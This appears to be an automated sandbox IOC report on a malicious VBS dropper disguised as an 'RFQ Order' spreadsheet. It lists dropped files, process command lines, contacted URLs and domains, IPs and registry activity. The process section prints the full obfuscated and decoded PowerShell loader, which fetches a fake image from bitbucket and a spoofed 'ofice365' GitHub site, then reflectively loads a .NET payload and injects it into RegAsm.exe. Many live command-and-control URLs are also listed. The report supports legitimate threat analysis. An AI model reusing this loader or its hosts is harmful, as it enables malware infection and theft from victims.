IOC Report
RFQ Order PT502818.xls.vbs

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps64201,00010010Label

Files

File Path
Type
Category
Malicious
Download
RFQ Order PT502818.xls.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5h3ca33g.gdw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeqmaw2v.sn4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyt2rrou.5um.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nj443z3a.3iz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwn3rtg2.2kd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pahfbcdw.lus.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ Order PT502818.xls.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@bQBB@H@@QQBn@GI@ZQ@v@G0@bwBj@C4@cwB3@GE@bgBv@Ho@YQBt@GE@Lg@x@C0@d@Bz@GE@ZQ@t@HM@dQ@u@DM@cw@u@DU@MgBh@Gs@ZQBs@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://www.menopausemarketing.pro/mtpi/?wR=WpZS+bw4JXH0y118vk5hQTOL+1r6bbOHRTASiZs1K9uS3ePifMNiBK1a8R3amt8aiouh&V4=jDKdPfM0e
91.195.240.19
malicious
www.cameronreitsma.net/mtpi/
malicious
http://www.nw01erf.pro/mtpi/?wR=LDlZA8c8ccZsWXrHXJy43Rqas/rkEJBbKG585dTsIiDnmU9iwQgUnyEkHdWjaY+U5WHy&V4=jDKdPfM0e
154.198.239.29
malicious
http://www.afrowears.store/mtpi/www.tokenpool.xyz
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
unknown
https://api.msn.com:443/v1/news/Feed/Windows?
unknown
http://www.exclusivepiscinas.netReferer:
unknown
http://www.nw01erf.pro/mtpi/www.hopeclothing.shop
unknown
http://www.jpsjlpszv1emibow.cyou/mtpi/
unknown
https://ofice365.github.io/1/test.jpg09
unknown
https://excel.office.com
unknown
http://www.afrowears.store/mtpi/
unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
unknown
http://www.hopeclothing.shop
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
unknown
http://www.ecommerce-25754.bond
unknown
http://www.hopeclothing.shop/mtpi/
unknown
http://www.hopeclothing.shopReferer:
unknown
http://www.tokenpool.xyzReferer:
unknown
http://www.jpsjlpszv1emibow.cyou
unknown
https://wns.windows.com/t.dllll
unknown
http://www.emiuniv.online
unknown
http://www.truow.life/mtpi/www.menopausemarketing.pro
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://android.notify.windows.com/iOSd
unknown
http://www.ecommerce-25754.bond/mtpi/
unknown
http://www.truow.life/mtpi/
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
unknown
http://www.exclusivepiscinas.net/mtpi/
unknown
http://www.emiuniv.onlineReferer:
unknown
https://word.office.com
unknown
https://ofice365.github.io
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
unknown
http://www.23461.bidReferer:
unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
unknown
http://www.hopeclothing.shop/mtpi/www.truow.life
unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
unknown
http://www.menopausemarketing.pro/mtpi/
unknown
https://outlook.com
unknown
https://github.com/Pester/Pester
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
unknown
http://www.ocgccv.info/mtpi/www.cameronreitsma.net
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
unknown
https://www.rd.com/list/polite-habits-campers-dislike/
unknown
http://www.jpsjlpszv1emibow.cyouReferer:
unknown
https://android.notify.windows.com/iOS
unknown
http://www.lekido.tech/mtpi/www.afrowears.store
unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
unknown
http://www.etimestrips.store/mtpi/
unknown
http://www.cameronreitsma.net
unknown
http://www.btvjirz612.vip
unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
unknown
http://www.nw01erf.pro
unknown
https://ofice365.github.io/1/test.jpg
185.199.109.153
http://www.afrowears.store
unknown
http://www.lekido.tech
unknown
http://www.ecommerce-25754.bondReferer:
unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
unknown
http://www.exclusivepiscinas.net/mtpi/www.ocgccv.info
unknown
http://schemas.micro
unknown
http://www.nw01erf.pro/mtpi/
unknown
http://www.exclusivepiscinas.net
unknown
https://aka.ms/odirm
unknown
http://www.menopausemarketing.pro
unknown
http://www.btvjirz612.vip/mtpi/www.lekido.tech
unknown
http://www.menopausemarketing.pro/mtpi/www.etimestrips.store
unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
unknown
http://www.truow.lifeReferer:
unknown
http://www.cameronreitsma.net/mtpi/
unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
unknown
http://www.ocgccv.info/mtpi/
unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
unknown
http://www.btvjirz612.vipReferer:
unknown
http://www.lekido.tech/mtpi/
unknown
http://www.nw01erf.proReferer:
unknown
https://bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?13711309
unknown
http://www.etimestrips.store
unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
unknown
http://www.23461.bid/mtpi/www.jpsjlpszv1emibow.cyou
unknown
http://www.jpsjlpszv1emibow.cyou/mtpi/www.ecommerce-25754.bond
unknown
http://www.tokenpool.xyz
unknown
http://www.etimestrips.store/mtpi/www.exclusivepiscinas.net
unknown
http://www.btvjirz612.vip/mtpi/
unknown
http://www.emiuniv.online/mtpi/
unknown
http://www.ocgccv.info
unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
unknown
https://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt
16.15.192.227
https://powerpoint.office.com
unknown
http://www.cameronreitsma.net/mtpi/www.emiuniv.online
unknown
http://www.afrowears.storeReferer:
unknown
http://www.tokenpool.xyz/mtpi/
unknown
https://aka.ms/Vh5j3k
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.nw01erf.pro
154.198.239.29
malicious
www.etimestrips.store
unknown
malicious
leka25.s3.us-east-1.amazonaws.com
unknown
malicious
www.menopausemarketing.pro
unknown
malicious
www.hopeclothing.shop
unknown
malicious
parkingpage.namecheap.com
91.195.240.19
ofice365.github.io
185.199.109.153
s3-r-w.us-east-1.amazonaws.com
16.15.192.227

IPs

IP
Domain
Country
Malicious
154.198.239.29
www.nw01erf.pro
Seychelles
malicious
16.15.192.227
s3-r-w.us-east-1.amazonaws.com
United States
185.199.109.153
ofice365.github.io
Netherlands
91.195.240.19
parkingpage.namecheap.com
Germany

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
Classes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\ShellNew
~reserved~
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts
LastUpdate
